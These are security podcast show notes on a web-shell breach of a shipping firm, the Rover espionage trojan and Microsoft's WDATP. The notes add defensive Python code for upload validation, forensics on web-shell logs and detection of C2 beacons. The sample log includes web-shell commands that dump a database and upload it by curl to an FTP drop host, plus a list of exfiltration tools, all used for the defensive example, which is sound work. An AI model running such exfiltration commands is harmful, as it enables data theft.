Fixing the Barn Door | TechSNAP 257

We’ll tell you about the real-world pirates who hacked a shipping company, the open-source libraries from the Mars rover found being used in malware, and Microsoft’s answer to the after-hack hangover.

Plus great questions, a packed round-up and much more!

Thanks to:

DigitalOcean
Ting
iXsystems

Show Notes:

Pirates hacked shipping company to find valuable cargo

  • As described in Verizon’s most recent Data Breach Digest, a collection of cyber-security case studies that the company’s RISK Team helped investigate and resolve over the past year, a global shipping conglomerate started having peculiar problems with sea pirates.
  • The shipping company told Verizon that pirates were boarding its vessels at regular intervals.
  • Equipped with a barcode reader (and weapons, of course), the pirates went straight to specific crates, emptied them of their high-value cargo, and were gone within minutes of boarding.
  • That precision made the shipping company suspect a leak, and it hired the RISK Team to track down the source.
  • The RISK Team quickly narrowed the problem down to the firm’s outdated, custom-built CMS, which contained an insecure file upload script.
  • As the Verizon team explained, an attacker, either a member of the pirate group or hired by it, used this upload form to place a web shell on the server. The upload script wrote files into a web-accessible directory, so the shell could be reached directly from a browser.
  • To make things worse, that directory also had “execute” permissions, so the uploaded shell ran server-side instead of being served back as an inert file. Either control on its own (uploads outside the webroot, or no script execution in the upload directory) would have stopped it.
  • Using the shell’s access to the shipping firm’s database, the attacker pulled down bills of lading (BoLs), future shipment schedules and ship routes, so the pirates could plan each boarding and identify the crates holding valuable cargo.
  • Fortunately, the attacker wasn’t that skilled. Verizon says the web shell did not support SSL, and every command it executed was recorded in the web server’s log. Note that TLS would only have hidden the traffic from the network: a web shell that takes its command in the request gets that request written to the server’s own access log either way.
  • From those logs, the RISK Team was able to reconstruct a timeline of the attacker’s actions and identify exactly what was looked at and where the files were sent.
  • Verizon’s RISK Team states:

“These threat actors, while given points for creativity, were clearly not highly skilled,” the RISK Team explains. “For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers.”
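Two halves of this case are worth seeing in code: the checks the CMS upload script was missing, and how a web shell’s command history comes back out of the web server’s access log the way the RISK Team rebuilt it. The following is an added example written for these notes, not code from the show or from Verizon; the upload directory, the shell name `img.php`, the `cmd` parameter, the IP addresses and the log lines are all constructed for the example.

```python
"""Added example: the missing upload checks, and a web shell's commands
recovered from an access log. Paths, IPs and log lines are constructed."""
import os
import re
import secrets
import urllib.parse
from datetime import datetime

# Assumption: uploads live outside the webroot, in a directory the web server
# neither serves nor executes from. That alone would have made the shell inert.
UPLOAD_DIR = "/var/lib/cms/uploads"

# Allowed extension -> magic bytes the content must start with. No script types.
ALLOWED_TYPES = {
    "pdf": b"%PDF-",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
}


def validate_upload(filename, data):
    """Return a random, safe filename for the upload, or None to reject it.

    The client-supplied name only selects the extension, and only from the
    allow-list; the stored name is random, so "shell.php", "bol.php.pdf" or
    "../../index.php" can never decide where the file lands or what it is called.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path part
    stem, dot, ext = base.lower().rpartition(".")
    if not dot or not stem or ext not in ALLOWED_TYPES:
        return None                     # no extension, or not on the allow-list
    if "." in stem:
        return None                     # double extension (x.php.pdf): reject
    if not data.startswith(ALLOWED_TYPES[ext]):
        return None                     # content does not match the claimed type
    return f"{secrets.token_hex(16)}.{ext}"   # store at os.path.join(UPLOAD_DIR, name)


# Apache "combined" format; nginx's default log format has the same shape.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

EXFIL_TOOLS = {"curl", "wget", "ftp", "scp", "nc", "ncat"}


def webshell_timeline(log_lines, shell_path, param="cmd"):
    """Return the shell's commands in log order, one dict per request.

    Shells of this kind take the command as a query-string parameter, so the
    server's access log holds the full request line. TLS would not change that:
    it hides the request from the network, not from the server's own log.
    """
    events = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urllib.parse.urlsplit(m.group("target"))
        if url.path != shell_path:
            continue
        cmds = urllib.parse.parse_qs(url.query).get(param)
        if not cmds:
            continue
        cmd = cmds[0]                   # parse_qs already decoded '+' and %XX
        words = cmd.split()
        exfil_to = None
        if words and words[0] in EXFIL_TOOLS:        # flag likely exfiltration
            exfil_to = next((w for w in words[1:] if "://" in w), None)
        events.append({
            "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "command": cmd,
            "exfil_to": exfil_to,
        })
    return events


# Constructed access-log excerpt: the shell was uploaded as "img.php".
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2016:03:14:22 +0000] "GET /uploads/img.php?cmd=ls+-la HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
198.51.100.22 - - [12/Jan/2016:03:14:40 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2016:03:15:01 +0000] "GET /uploads/img.php?cmd=mysqldump+-u+cms+shipping+bills_of_lading+%3E+/tmp/bol.sql HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2016:03:15:40 +0000] "GET /uploads/img.php?cmd=lss+-la+/tmp HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2016:03:16:05 +0000] "GET /uploads/img.php?cmd=curl+-T+/tmp/bol.sql+ftp://198.51.100.9/drop/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for e in webshell_timeline(SAMPLE_LOG.splitlines(), "/uploads/img.php"):
        flag = f"  -> exfil to {e['exfil_to']}" if e["exfil_to"] else ""
        print(f"{e['time']:%Y-%m-%d %H:%M:%S} {e['ip']} {e['command']}{flag}")
```

Run stand-alone it prints the four shell requests in order, including the mistyped `lss` the Verizon write-up alludes to and the `curl` upload to the drop host. If the shell had taken its commands in a POST body instead, the default log formats above would only show the request path, which is why the forensic lesson is to log (or at least capture) request bodies for scripts in upload directories, and the engineering lesson is not to have executable upload directories at all.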


Open source libraries from Mars Rover found being used in malware

  • According to Palo Alto Networks, on December 24, 2015, India’s Ambassador to Afghanistan received a spear-phishing email carrying a new malware variant which, if downloaded and installed, would have opened a backdoor on the official’s computer.
  • India has been a trusted partner of Afghanistan, helping build its new Parliament complex and the Salma Dam, along with smaller transportation, energy and infrastructure projects.
  • Given that close collaboration, it is hardly surprising that other nations or interest groups want to know what the two countries are planning together.
  • The email was spoofed to look as if it came from India’s Defence Minister, Manohar Parrikar. Attached to it was an RTF file.
  • Palo Alto researchers say the file contained an exploit for CVE-2010-3333, a stack buffer overflow in the RTF parser of Microsoft Office (Office XP through Office 2010) that Microsoft patched in MS10-087 back in November 2010. Opening it on an unpatched machine downloaded a file named “file.exe” from the newsumbrealla[.]net domain.
  • That file was launched automatically and was a simple dropper whose only job was to fetch the real threat, a new trojan the researchers christened Rover.
  • The malware was given the “Rover” name because it relies on the OpenCV and OpenAL open-source libraries, both used in the software deployed with the famous Mars rover exploration robot.
  • OpenCV is a library used in computer vision and image processing, while OpenAL is a cross-platform library for working with multichannel audio.
  • Rover’s capabilities included taking BMP screenshots of the desktop and sending them to the C&C server every 60 minutes, logging keystrokes and uploading them to the C&C server every 10 seconds, and scanning for Office files and uploading them to the C&C server every 60 minutes.
  • There was also a backdoor component that let the attackers send commands from the C&C server, telling Rover to take screenshots or start recording video (via the webcam) and audio (via the microphone) on demand.
  • “Though ‘Rover’ is an unsophisticated malware lacking modern malware features, it seems to be successful in bypassing traditional security systems and fulfilling the objectives of the threat actor behind the campaign in exfiltrating information from the targeted victim,” Palo Alto researchers explain.
  • Rover is largely undetected by today’s antivirus engines, and despite its thin feature set it keeps a low profile, which is exactly what cyber-espionage groups need from their malware in the first place.
  • New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan – Palo Alto Networks Blog
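The fixed cadences Palo Alto describes (keystroke uploads every 10 seconds, screenshots every 60 minutes) are the kind of thing that shows up in any outbound connection log even when the destination is unknown and the binary is not. The following is an added example written for these notes, not Palo Alto’s code: a small beacon detector run over a constructed four-hour connection log. The victim IP, the NTP and browsing hosts, and the jitter values are assumptions; only the C2 domain comes from the write-up, and it is kept defanged.

```python
"""Added example: spotting Rover-style C2 traffic by its timing alone.
Hosts, the victim IP and the connection log are constructed."""
import random
from collections import defaultdict
from statistics import median

C2 = "newsumbrealla[.]net"   # domain from the Palo Alto write-up, defanged
VICTIM = "10.20.0.15"        # constructed


def constructed_connections(seed=7, hours=4):
    """Build a constructed outbound connection log of (seconds, src, dst):
    keystroke uploads to the C2 every ~10 s with jitter, a legitimate NTP poll
    every 1024 s, and irregular user browsing."""
    rng = random.Random(seed)
    events = []
    t = 0.0
    while t < hours * 3600:
        events.append((t, VICTIM, C2))                  # Rover keylog upload
        t += 10 + rng.uniform(-1, 1)
    for k in range(0, hours * 3600, 1024):
        events.append((float(k), VICTIM, "time.example.net"))  # NTP poller
    t = 0.0
    while t < hours * 3600:
        events.append((t, VICTIM, "www.example.com"))   # human browsing
        t += rng.uniform(20, 900)
    events.sort()
    return events


def find_beacons(events, min_events=10, max_spread=0.2, allowlist=()):
    """Return {(src, dst): period_seconds} for every pair whose gaps between
    connections cluster tightly around one value.

    spread = MAD(gaps) / median(gaps): 0 for a perfectly regular beacon, about
    0.5 for gaps spread uniformly over a wide range. Median and MAD rather than
    mean and standard deviation, so a few outliers (retries, a screenshot
    upload landing between two keylog uploads) do not hide the pattern.
    """
    by_pair = defaultdict(list)
    for t, src, dst in events:
        by_pair[(src, dst)].append(t)
    beacons = {}
    for pair, times in by_pair.items():
        if pair[1] in allowlist or len(times) < min_events:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = median(gaps)
        if period <= 0:
            continue
        spread = median(abs(g - period) for g in gaps) / period
        if spread <= max_spread:
            beacons[pair] = round(period, 1)
    return beacons


if __name__ == "__main__":
    log = constructed_connections()
    print(find_beacons(log))                                   # C2 and NTP
    print(find_beacons(log, allowlist={"time.example.net"}))   # C2 only
```

The first call flags both the C2 (period about 10 s) and the NTP server (period 1024 s): periodicity alone cannot tell malware from a legitimate poller, which is why the allow-list exists and why in practice this is a triage signal rather than an alert on its own. The 60-minute screenshot cadence would surface the same way over a longer window; here it would only add a handful of near-zero outliers to the 10-second stream, which the MAD-based spread tolerates.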

Microsoft brings post-breach detection features to Windows

  • Microsoft announced Windows Defender Advanced Threat Protection (WDATP), a new post-breach enterprise security service intended to detect and respond to advanced attacks on company networks.
  • Microsoft says it currently takes an enterprise more than 200 days to detect a security breach and a further 80 days to contain it. In that time the attackers can steal company data, find private information, and damage the brand and customers’ trust in the company.
  • For example, a social engineering attack might persuade a victim to run a program attached to an e-mail or execute a suspicious-looking PowerShell command. The Advanced Persistent Threat (APT) tooling typically used in such attacks may then scan ports, connect to network shares looking for data to steal, or connect to remote systems to fetch new instructions and exfiltrate data. WDATP monitors this behaviour and measures how far it deviates from normal, expected system behaviour. The baseline is the aggregate behaviour collected anonymously from more than 1 billion Windows systems: if machines on your network start doing something the “average Windows machine” doesn’t, WDATP alerts you.
  • The whole thing is cloud-based, with no on-premises server required. A client on each endpoint is needed, presumably an extended version of the Windows Defender client.
  • WDATP is still under development, though it is already available to some early-adopter customers.
  • The service is meant to help enterprises detect, investigate and respond to advanced attacks on their networks.
  • Microsoft says it is building on the security defences Windows 10 already offers, adding a post-breach layer to the Windows 10 security stack.
  • The client technology built into Windows 10, together with the cloud service, is intended to detect threats that have made it past other defences, give enterprises the information to investigate a breach across endpoints, and offer response recommendations.
  • To avoid Windows 7 becoming “the new Windows XP,” the company is being rather more aggressive in pressuring users to upgrade to Windows 10 sooner rather than later.
  • WDATP is part of that same push to Windows 10, and it won’t be available for older operating systems.
  • Windows Defender Advanced Threat Protection uses cloud power to figure out you’ve been pwned | Ars Technica
